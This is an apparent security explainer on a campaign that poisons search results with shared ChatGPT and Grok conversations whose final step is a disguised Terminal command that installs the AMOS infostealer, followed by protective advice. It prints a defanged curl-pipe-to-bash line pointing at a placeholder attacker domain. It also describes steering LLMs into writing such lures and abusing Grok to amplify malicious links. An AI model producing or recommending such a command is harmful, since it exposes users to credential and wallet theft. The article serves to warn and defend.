This technique, which researchers often categorize as a twist on SEO poisoning and social engineering, turns legitimate, shared AI conversations into the ultimate bait.
The Anatomy of the Attack: The "ClickFix" Twist
The core of this campaign lies in a multi-stage process that weaponizes search engine optimization (SEO) and the LLMs' native sharing features.
1. SEO Poisoning for High Visibility
The attack begins with classic SEO poisoning.
Targeted Queries: Attackers identify common, high-intent troubleshooting queries, such as "clear disk space on macOS," "free up storage on Mac," or how to install specific software.
Malicious Conversations: The threat actor crafts a conversation with ChatGPT, Grok, or another LLM.
They use prompt engineering to guide the AI into generating a seemingly legitimate, step-by-step troubleshooting or maintenance guide. Crucially, the final step in this guide is a command (e.g., one to run in the macOS Terminal) that looks benign but is actually a disguised malicious payload.
Sharing and Indexing: Using the AI platform's built-in share feature, the attacker generates a public link to this poisoned conversation.
They then use networks of content farms, forums, and indexed sites to artificially inflate the link's backlink relevance for the targeted search terms.
This sophisticated manipulation tricks search engines like Google into ranking the legitimate-looking URL (e.g., a link to chatgpt.com or grok.com) very high in search results—often on the first page.
2. The Deception: Abusing AI Trust
When an unsuspecting user searches for their problem, a highly-ranked link to a legitimate platform (ChatGPT or Grok) appears.
Platform Trust: The link points to a trusted, official domain. The user is conditioned to trust guidance coming from a known AI source.
Format Trust: The page the user lands on is an authentic shared conversation, featuring the LLM's polite, instructional language.
It looks exactly like the helpful AI responses people see every day.
Execution Lure: The final, seemingly helpful instruction—such as a command to run in the macOS Terminal—is presented as the necessary step to solve the user's initial problem (e.g., clearing disk space).
The user, trusting the source and format, executes the command.
3. The Payload: Infostealer Infection
The command executed by the user is typically a one-line script that:
Downloads a malicious bash script from an attacker-controlled server.
Executes that script, deploying infostealer malware such as AMOS (Atomic macOS Stealer).
This malware silently begins harvesting sensitive data, including passwords, credit card details, cryptocurrency wallet information, and other credentials, and often establishes persistence to remain on the system.
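To make the pattern concrete, the snippet below is a minimal, defanged sketch of what such a lure might look like. The domain and script name are placeholders invented for illustration, not indicators from a real campaign; the point is that the command imitates the familiar curl-pipe-to-shell install pattern, so it reads as routine maintenance while actually handing control to an attacker-controlled script.

```bash
# Hypothetical, defanged illustration of the "final step" a poisoned shared
# conversation might present. The domain is a placeholder, not a real indicator.
#
#   "Step 4: Paste this into Terminal to reclaim disk space:"
/bin/bash -c "$(curl -fsSL https://mac-cleanup[.]example/free-space.sh)"
#
# This mimics the curl-pipe-to-shell pattern used by legitimate installers,
# but the fetched script is attacker-controlled and can drop a stealer like AMOS.
```

Because the victim copies and runs the command themselves, nothing is downloaded through the browser, and the fetched script never carries the quarantine attributes that normally trigger warnings for downloaded apps.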
This attack is particularly potent because the victim runs the command themselves, bypassing many traditional security controls that focus on blocking malicious downloads and attachments.
Broader Context: Other AI Weaponization Tactics
The use of shared chat links is not the only way LLMs are being weaponized:
"Grokking" Malvertising: Threat actors have been caught exploiting X (formerly Twitter)'s Grok AI to bypass ad platform security.
They hide malicious links in the video metadata of promoted posts, then prompt Grok to publicly reply with the full, clickable link, leveraging Grok's trusted, system-level account to amplify the scam to millions of users.
AI-Aided Malware Creation: Hackers utilize LLMs to generate modular code snippets, obfuscation scripts, and data-exfiltration routines, which they combine to create more sophisticated malware that is difficult for traditional antivirus to detect.
Uncensored LLMs ("WormGPT"): Jailbroken or uncensored versions of commercial LLMs are being sold on hacker forums.
These tools act as on-demand "cybercriminal assistants," capable of writing highly convincing phishing emails and generating malicious code, lowering the barrier to entry for cybercrime.
How to Protect Yourself
The key to defense in this new landscape is skepticism toward AI-generated content, even when it appears on a trusted domain.
Be Critical of Terminal Commands: Never execute Terminal (or Command Prompt) commands from a source you did not fully vet and understand, especially if you found them through a search result; a safer inspection workflow is sketched after this list.
Verify the Source: Even if the link is on chatgpt.com or grok.com, look closely. If the conversation offers a complex, multi-step process for a simple task, pause and verify the advice from multiple independent, established sources (e.g., official Apple support pages, well-known tech blogs).
Avoid Sponsored Results: Be extremely wary of sponsored search results (ads) at the top of a search page, as attackers often pay to have their poisoned links promoted to the highest-visibility position.
Employ Robust Security:
Use a high-quality, real-time anti-malware solution that includes web protection.
Implement Multi-Factor Authentication (MFA) on all critical accounts.
Use a reputable password manager to generate and store long, unique passwords.
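As a practical illustration of the first point above, the sketch below shows one safer way to handle any command a guide asks you to run: fetch the referenced script to a file, read it, and only then decide. The URL is a placeholder standing in for whatever the guide actually points at.

```bash
# Instead of piping a remote script straight into a shell (curl ... | bash),
# download it to a file and inspect it first. The URL below is a placeholder.
curl -fsSL -o suspect.sh "https://example.com/free-space.sh"

less suspect.sh            # read every line; question curl, base64, or osascript calls you don't understand
file suspect.sh            # confirm it is plain text, not a disguised binary
shasum -a 256 suspect.sh   # record the hash in case you need to research or report it

# Only run the script if you fully understand what every line does:
# bash suspect.sh
```

Even then, prefer instructions from official vendor documentation over a command you found through a search result, no matter how trustworthy the hosting domain looks.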